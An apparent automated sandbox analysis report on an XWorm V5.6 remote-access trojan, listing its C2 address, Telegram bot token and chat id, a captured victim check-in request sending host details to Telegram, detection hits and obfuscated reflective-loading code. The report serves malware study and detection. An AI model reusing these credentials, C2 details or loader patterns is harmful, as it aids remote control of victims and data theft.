Source: 00000001.00000002.3744158819.0000000002491000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"} |
Source: Mzo6BdEtGv.exe |
String decryptor: 89.40.31.232 |
Source: Mzo6BdEtGv.exe |
String decryptor: 1717 |
Source: Mzo6BdEtGv.exe |
String decryptor: <Xwormmm> |
Source: Mzo6BdEtGv.exe |
String decryptor: 28Nov2024 |
Source: Mzo6BdEtGv.exe |
String decryptor: USB.exe |
Source: Mzo6BdEtGv.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: Mzo6BdEtGv.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: Network traffic |
Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.10:49708 -> 149.154.167.220:443 |
Source: Yara match |
File source: Mzo6BdEtGv.exe, type: SAMPLE |
Source: Yara match |
File source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPE |
Source: global traffic |
HTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFE6865D607A29FAFDCBE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GCCE9LGK%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.40.31.232 |
Source: global traffic |
HTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFE6865D607A29FAFDCBE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GCCE9LGK%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: Mzo6BdEtGv.exe, 00000001.00000002.3744158819.0000000002491000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Mzo6BdEtGv.exe |
String found in binary or memory: https://api.telegram.org/bot |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: Mzo6BdEtGv.exe, type: SAMPLE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process Stats: CPU usage > 49% |
Source: Mzo6BdEtGv.exe, 00000001.00000000.1284453608.00000000000F6000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameRaw.exe4 vs Mzo6BdEtGv.exe |
Source: Mzo6BdEtGv.exe |
Binary or memory string: OriginalFilenameRaw.exe4 vs Mzo6BdEtGv.exe |
Source: Mzo6BdEtGv.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: Mzo6BdEtGv.exe, type: SAMPLE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: Mzo6BdEtGv.exe, hMY5B4KaPYBa602NktZ1e4wVF.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: Mzo6BdEtGv.exe, hMY5B4KaPYBa602NktZ1e4wVF.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: Mzo6BdEtGv.exe, jK41xlYzptzDvBwid77hpLBxe.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: Mzo6BdEtGv.exe, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.cs |
Base64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9' |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@1/0@1/2 |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Mutant created: NULL |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Mutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo |
Source: Mzo6BdEtGv.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: avicap32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: msvfw32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: Mzo6BdEtGv.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs |
.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[]) |
Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs |
.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[]) |
Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs |
.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 |
Source: Mzo6BdEtGv.exe, lYfWlfT3r7Vqz88tbfAuCjKRe.cs |
High entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL' |
Source: Mzo6BdEtGv.exe, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.cs |
High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid' |
Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs |
High entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi' |
Source: Mzo6BdEtGv.exe, hMY5B4KaPYBa602NktZ1e4wVF.cs |
High entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh' |
Source: Mzo6BdEtGv.exe, jK41xlYzptzDvBwid77hpLBxe.cs |
High entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my' |
Source: Mzo6BdEtGv.exe, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.cs |
High entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16' |
Source: Mzo6BdEtGv.exe, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.cs |
High entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr' |
Source: Mzo6BdEtGv.exe, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.cs |
High entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw' |
Source: Mzo6BdEtGv.exe, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.cs |
High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY' |
Source: Mzo6BdEtGv.exe, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.cs |
High entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB' |
Source: Mzo6BdEtGv.exe, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.cs |
High entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6' |
